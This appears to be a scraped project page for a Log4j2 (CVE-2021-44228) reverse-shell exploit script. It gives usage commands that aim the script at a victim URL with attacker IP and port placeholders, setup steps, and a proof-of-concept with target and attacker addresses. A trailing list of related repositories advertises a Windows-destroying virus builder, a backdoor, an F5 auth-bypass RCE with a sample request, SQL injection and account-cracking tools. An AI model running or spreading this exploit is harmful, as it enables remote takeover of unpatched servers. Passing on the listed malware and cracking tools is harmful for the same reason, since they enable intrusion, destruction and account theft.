Log4j2 CVE-2021-44228 revshell

Related tags

Security related resourcesLog4j2-CVE-2021-44228-revshell
Overview

Log4j2-CVE-2021-44228-revshell

Usage

For reverse shell:
$~ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

For check exploitable:
$~ python3 Log4j2-revshell.py -M check -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort]

$~  python3 Log4j2-revshell.py -h
    usage: Log4j2-revshell.py [-h] -M MODE -u TARGET -l LHOST -p LPORT [-hp HTTPPORT]

    Log4j2 Reverse Shell

    optional arguments:
      -h, --help            show this help message and exit
      -M MODE, --mode MODE  Mode: check or rev
      -u TARGET, --target TARGET
                            Target full URL, http://www.victimLog4j.xyz:8080
      -l LHOST, --lhost LHOST
                            Attacker IP for receive revshell
      -p LPORT, --lport LPORT
                            Attacker port for receive revshell
      -hp HTTPPORT, --httpport HTTPPORT
                            HTTP server port on attacker host

Requirement

1. Marshalsec jndi.LDAPRefServer # see here, https://github.com/mbechler/marshalsec
2. Java 8 # you can get Java 8 here https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html, 
   suggested to install jdk-8u181-linux-x64.tar.gz [Java 1.8.0_181]
3. This script, Log4j2-revshell.py

TLDR; Guided step

$ Open browser and Download Java 8 from https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html 
  In Java SE Development Kit 8u181 section, select jdk-8u181-linux-x64.tar.gz or appropriate package based on your OS.
    
$ sudo mkdir /usr/lib/jvm #Make this dir if you do not have yet
$ cd /usr/lib/jvm
$ sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz #Extract downloaded jdk-8u181-linux-x64.tar.gz into /usr/lib/jvm
$ sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
$ sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
$ sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1

$ sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
$ sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
$ sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
$ java -version #verify if you are running Java 1.8.0_181

$ git clone https://github.com/mbechler/marshalsec /tmp/Log4j2-dir; cd /tmp/Log4j2-dir #Install marshalsec jndi.LDAPRefServer
$ sudo apt install -y maven #Build marshalsec with the Java builder maven. If you do not have maven, please install first
$ mvn clean package -DskipTests #Build marshalsec tool with maven 
$ cd /tmp/Log4j2-dir; wget -q https://raw.githubusercontent.com/faisalfs10x/Log4j2-CVE-2021-44228-revshell/main/Log4j2-revshell.py

$ python3 Log4j2-revshell.py -M rev -u http://www.victimLog4j.xyz:8080 -l [AttackerIP] -p [AttackerPort] -hp [HTTPServerPort]

PoC

target host: http://192.168.5.122:8080
attacker host: 192.168.5.120
log4j2.mp4

Tested on

- Ubuntu 18.04

Disclaimer:

The script is for security analysis and research only, hence I would not be liable if it is been used for illicit activities
Owner
FaisalFs
◤✞ 𝖏𝖚𝖘𝖙 𝖆 𝖘𝖎𝖒𝖕𝖑𝖊 𝖑𝖚𝖈𝖐 ✞◥
FaisalFs
GitHub Repository
Convert a collection of features to a fixed-dimensional matrix using the hashing trick.

FeatureHasher Convert a collection of features to a fixed-dimensional matrix using the hashing trick. Note, this requires Jina=2.2.4. Example Here I

Jina AI 5 Mar 15, 2022
A OSINT tool coded in python

Argus Welcome to Argus, a OSINT tool coded in python. Disclaimer I Am not responsible what you do with the information that is given to you by my tool

Aidan 2 Mar 20, 2022
A blind SQL injection script that uses binary search aka bisection method to dump datas from database.

Blind SQL Injection I wrote this script to solve PortSwigger Web Security Academy's particular Blind SQL injection with conditional responses lab. Bec

Şefik Efe 2 Oct 29, 2022
Password-Manager GUI

PASSWORD-MANAGER This repo contains all the project files. Project Description A Tkinter GUI that allows you to store website info like website name,

David .K. Danso 1 Dec 08, 2021
Virus-Builder - This tool will generate a virus that can only destroy Windows computer

Virus-Builder - This tool will generate a virus that can only destroy Windows computer. You can also configure to auto run in usb drive

Saad 16 Dec 30, 2022
Tinyman exploit finder - Tinyman exploit finder for python

tinyman_exploit_finder There was a big tinyman exploit. You can read about it he

fish.exe 9 Dec 27, 2022
A Safer PoC for CVE-2022-22965 (Spring4Shell)

Safer_PoC_CVE-2022-22965 A Safer PoC for CVE-2022-22965 (Spring4Shell) Functionality Creates a file called CVE_2022-22965_exploited.txt in the tomcat

Colin Cowie 46 Nov 12, 2022
CVE-2022-22963 PoC

CVE-2022-22963 CVE-2022-22963 PoC Slight modified for English translation and detection of https://github.com/chaosec2021/Spring-cloud-function-SpEL-R

Nicolas Krassas 104 Dec 08, 2022
md5 hash cracking with python.

Python-Md5-Cracker- md5 hash cracking with python. Original files added First create a file called word.txt then run the wordCreate.py script The task

Nebil Sharifi 0 Aug 31, 2022
Simple Dos-Attacker.

dos-attacker ❕ Atenção Não ataque sites privados. isto é illegal. 🖥️ Pré-requisitos Ultima versão do Python3. para verificar isto, é bem simples. Bas

Dio brando 10 Apr 15, 2022
Wireguard VPN Server Installer for: on Ubuntu, Debian, Arch, Fedora and CentOS

XGuard (Wireguard Server Installer) This Python script should make the installation of a Wireguard VPN server as easy as possible. Wireguard is a mode

Johann 3 Nov 04, 2022
Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

Script to calculate Active Directory Kerberos keys (AES256 and AES128) for an account, using its plaintext password

Matt Creel 27 Dec 20, 2022
A Python r2pipe script to automatically create a Frida hook to intercept TLS traffic for Flutter based apps

boring-flutter A Python r2pipe script to automatically create a Frida hook to intercept TLS traffic for Flutter based apps. Currently only supporting

Hamza 64 Oct 18, 2022
Lite version of my Gatekeeper backdoor for public use.

Gatekeeper Lite Backdoor Fully functioning bind-type backdoor This backdoor is a fully functioning bind shell and lite version of my full functioning

Joe Helle 56 Mar 25, 2022
Add a Web Server based on Rogue Mysql Server to allow remote user get

介绍 对于需要使用 Rogue Mysql Server 的漏洞来说,若想批量检测这种漏洞的话需要自备一个服务器。并且我常用的Rogue Mysql Server 脚本 不支持动态更改读取文件名、不支持远程用户访问读取结果、不支持批量化检测网站。于是乎萌生了这个小脚本的想法 Rogue-MySql-

6 May 17, 2022
This repository uses a mixture of numbers, alphabets, and other symbols found on the computer keyboard

This repository uses a mixture of numbers, alphabets, and other symbols found on the computer keyboard to form a 16-character password which is unpredictable and cannot easily be memorised.

Mohammad Shaad Shaikh 1 Nov 23, 2021
NS-Defacer: a auto html injecter, In other words It's a auto defacer to deface a lot of websites in less time

Overview NS-Defacer is a auto html injecter, In other words It's a auto defacer

NightSec 10 Nov 19, 2022
CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE

CVE-2022-1388 CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE. POST /mgmt/tm/util/bash HTTP/1.1 Host: Accept-Encoding: gzip, deflate Accept: */

M4rtin Hsu 81 Dec 12, 2022
Facebook Fast Cracking Tool With Python

Pro-Crack Facebook Fast Cracking Tool This is a multi-password‌ cracking tool that can help you hack facebook accounts very quickly Installation On Te

ReD H4CkeR 5 Feb 19, 2022
Scans all drives for log4j jar files and gets their version from the manifest

log4shell_scanner Scans all drives for log4j jar files and gets their version from the manifest. Windows and Windows Server only.

Zdeněk Loučka 1 Dec 29, 2021